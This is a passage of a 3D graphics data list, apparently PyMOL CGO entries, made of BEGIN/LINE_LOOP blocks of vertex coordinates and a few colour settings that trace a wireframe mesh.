VERTEX, 21.537, 40.251, 28.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.249, 40.300, 29.129,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.258, 40.530, 29.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.551, 40.479, 28.970,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.258, 40.530, 29.130,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.316, 40.689, 29.285,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.609, 40.628, 29.135,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.316, 40.689, 29.285,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.389, 40.685, 29.503,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.678, 40.609, 29.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.389, 40.685, 29.503,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.434, 40.520, 29.656,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.434, 40.520, 29.656,
VERTEX, 21.716, 40.434, 29.497,
END,
COLOR, 0.000, 0.949, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 21.702, 40.205, 29.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.931, 40.094, 29.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.702, 40.205, 29.482,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 21.643, 40.057, 29.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.873, 39.957, 29.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.643, 40.057, 29.317,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 21.575, 40.076, 29.099,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.823, 39.990, 28.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.575, 40.076, 29.099,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 21.537, 40.251, 28.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.811, 40.172, 28.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.537, 40.251, 28.955,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 21.551, 40.479, 28.970,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.844, 40.398, 28.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.551, 40.479, 28.970,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 21.609, 40.628, 29.135,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.902, 40.535, 28.968,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.609, 40.628, 29.135,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 21.678, 40.609, 29.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.951, 40.502, 29.190,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.678, 40.609, 29.354,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 21.716, 40.434, 29.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 21.716, 40.434, 29.497,
VERTEX, 21.963, 40.320, 29.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 21.931, 40.094, 29.303,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 22.124, 39.945, 29.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.931, 40.094, 29.303,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 21.873, 39.957, 29.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 22.066, 39.822, 28.938,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.873, 39.957, 29.128,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 21.823, 39.990, 28.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 22.049, 39.864, 28.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.823, 39.990, 28.906,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 21.811, 40.172, 28.767,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 22.082, 40.048, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.811, 40.172, 28.767,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 21.844, 40.398, 28.793,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 22.146, 40.265, 28.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.844, 40.398, 28.793,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 21.902, 40.535, 28.968,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 22.204, 40.389, 28.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.902, 40.535, 28.968,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 21.951, 40.502, 29.190,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 22.221, 40.347, 29.025,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.951, 40.502, 29.190,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 21.963, 40.320, 29.328,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 21.963, 40.320, 29.328,
VERTEX, 22.188, 40.163, 29.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.124, 39.945, 29.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 22.304, 39.749, 28.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.124, 39.945, 29.123,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.066, 39.822, 28.938,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 22.247, 39.641, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.066, 39.822, 28.938,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.049, 39.864, 28.713,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 22.270, 39.686, 28.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.049, 39.864, 28.713,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.082, 40.048, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 22.357, 39.860, 28.406,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.082, 40.048, 28.580,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.146, 40.265, 28.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 22.459, 40.059, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.146, 40.265, 28.616,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.204, 40.389, 28.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 22.515, 40.168, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.204, 40.389, 28.800,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.221, 40.347, 29.025,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 22.492, 40.122, 28.875,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.221, 40.347, 29.025,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.188, 40.163, 29.159,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.188, 40.163, 29.159,
VERTEX, 22.405, 39.949, 28.998,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.304, 39.749, 28.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.499, 39.487, 28.784,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.304, 39.749, 28.947,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.247, 39.641, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.446, 39.396, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.247, 39.641, 28.752,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.270, 39.686, 28.528,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.505, 39.440, 28.363,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.270, 39.686, 28.528,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.357, 39.860, 28.406,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.640, 39.594, 28.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.357, 39.860, 28.406,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.459, 40.059, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.773, 39.768, 28.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.459, 40.059, 28.457,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 22.515, 40.168, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.826, 39.859, 28.534,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.515, 40.168, 28.651,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 22.492, 40.122, 28.875,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.767, 39.814, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.492, 40.122, 28.875,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 22.405, 39.949, 28.998,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 22.405, 39.949, 28.998,
VERTEX, 22.632, 39.660, 28.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 22.499, 39.487, 28.784,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.726, 39.138, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.499, 39.487, 28.784,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.446, 39.396, 28.580,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.679, 39.068, 28.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.446, 39.396, 28.580,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.505, 39.440, 28.363,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.768, 39.109, 28.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.505, 39.440, 28.363,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.640, 39.594, 28.259,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.941, 39.237, 28.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.640, 39.594, 28.259,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 22.773, 39.768, 28.330,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 23.096, 39.378, 28.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.773, 39.768, 28.330,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 22.826, 39.859, 28.534,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 23.143, 39.448, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.826, 39.859, 28.534,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 22.767, 39.814, 28.752,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 23.054, 39.407, 28.665,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 39.814, 28.752,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 22.632, 39.660, 28.855,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 22.632, 39.660, 28.855,
VERTEX, 22.881, 39.279, 28.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 22.726, 39.138, 28.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.903, 38.757, 28.542,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.726, 39.138, 28.651,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.679, 39.068, 28.437,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.863, 38.708, 28.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.679, 39.068, 28.437,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.768, 39.109, 28.229,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.980, 38.735, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.768, 39.109, 28.229,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 22.941, 39.237, 28.149,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 23.185, 38.822, 28.069,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.941, 39.237, 28.149,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.096, 39.378, 28.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 23.358, 38.917, 28.186,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.096, 39.378, 28.243,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.143, 39.448, 28.457,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 23.398, 38.966, 28.407,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.143, 39.448, 28.457,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.054, 39.407, 28.665,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 23.281, 38.939, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 39.407, 28.665,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 22.881, 39.279, 28.745,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 22.881, 39.279, 28.745,
VERTEX, 23.076, 38.853, 28.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 22.903, 38.757, 28.542,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.977, 38.390, 28.452,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.903, 38.757, 28.542,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.863, 38.708, 28.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.945, 38.360, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.863, 38.708, 28.321,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.980, 38.735, 28.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 23.081, 38.364, 28.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.980, 38.735, 28.125,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.185, 38.822, 28.069,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.305, 38.399, 28.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 38.822, 28.069,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.358, 38.917, 28.186,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.486, 38.445, 28.139,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.358, 38.917, 28.186,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.398, 38.966, 28.407,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.518, 38.475, 28.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.398, 38.966, 28.407,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.281, 38.939, 28.603,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 23.381, 38.471, 28.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.281, 38.939, 28.603,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.076, 38.853, 28.659,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.076, 38.853, 28.659,
VERTEX, 23.157, 38.436, 28.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 22.977, 38.390, 28.452,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.979, 38.018, 28.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.977, 38.390, 28.452,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.945, 38.360, 28.226,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.956, 38.005, 28.157,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.945, 38.360, 28.226,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 23.081, 38.364, 28.041,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.102, 37.990, 27.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.081, 38.364, 28.041,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.305, 38.399, 28.005,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.330, 37.983, 27.957,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 38.399, 28.005,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.486, 38.445, 28.139,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.508, 37.987, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.486, 38.445, 28.139,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.518, 38.475, 28.365,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.531, 38.000, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.518, 38.475, 28.365,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.381, 38.471, 28.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.386, 38.015, 28.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.381, 38.471, 28.550,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.157, 38.436, 28.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.157, 38.436, 28.586,
VERTEX, 23.157, 38.022, 28.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 22.979, 38.018, 28.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.931, 37.634, 28.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.979, 38.018, 28.385,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.956, 38.005, 28.157,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 22.916, 37.636, 28.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.956, 38.005, 28.157,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 23.102, 37.990, 27.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.066, 37.613, 27.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.102, 37.990, 27.980,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.330, 37.983, 27.957,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.293, 37.580, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.330, 37.983, 27.957,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.508, 37.987, 28.103,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.463, 37.555, 28.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.508, 37.987, 28.103,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.531, 38.000, 28.331,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.478, 37.553, 28.310,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.531, 38.000, 28.331,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.386, 38.015, 28.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.328, 37.576, 28.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.386, 38.015, 28.508,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.157, 38.022, 28.531,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.157, 38.022, 28.531,
VERTEX, 23.101, 37.609, 28.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 37.634, 28.345,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.853, 37.241, 28.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 37.634, 28.345,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.916, 37.636, 28.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 22.847, 37.256, 28.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.916, 37.636, 28.116,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 23.066, 37.613, 27.943,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.002, 37.237, 27.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.066, 37.613, 27.943,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 23.293, 37.580, 27.929,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.227, 37.194, 27.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.293, 37.580, 27.929,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.463, 37.555, 28.081,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.227, 37.194, 27.923,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.390, 37.152, 28.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.463, 37.555, 28.081,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.478, 37.553, 28.310,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.390, 37.152, 28.079,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.396, 37.136, 28.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.478, 37.553, 28.310,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.328, 37.576, 28.482,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.396, 37.136, 28.308,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.241, 37.156, 28.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.328, 37.576, 28.482,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.101, 37.609, 28.496,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.241, 37.156, 28.476,
VERTEX, 23.101, 37.609, 28.496,
VERTEX, 23.016, 37.199, 28.485,
END,
COLOR, 0.000, 0.969, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 23.016, 37.199, 28.485,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.853, 37.241, 28.329,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.931, 36.794, 28.497,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.772, 36.840, 28.337,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.853, 37.241, 28.329,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.847, 37.256, 28.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.772, 36.840, 28.337,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 22.774, 36.869, 28.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.847, 37.256, 28.100,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 23.002, 37.237, 27.932,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.774, 36.869, 28.110,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 22.936, 36.864, 27.947,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.002, 37.237, 27.932,
VERTEX, 22.936, 36.864, 27.947,
VERTEX, 23.227, 37.194, 27.923,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.936, 36.864, 27.947,
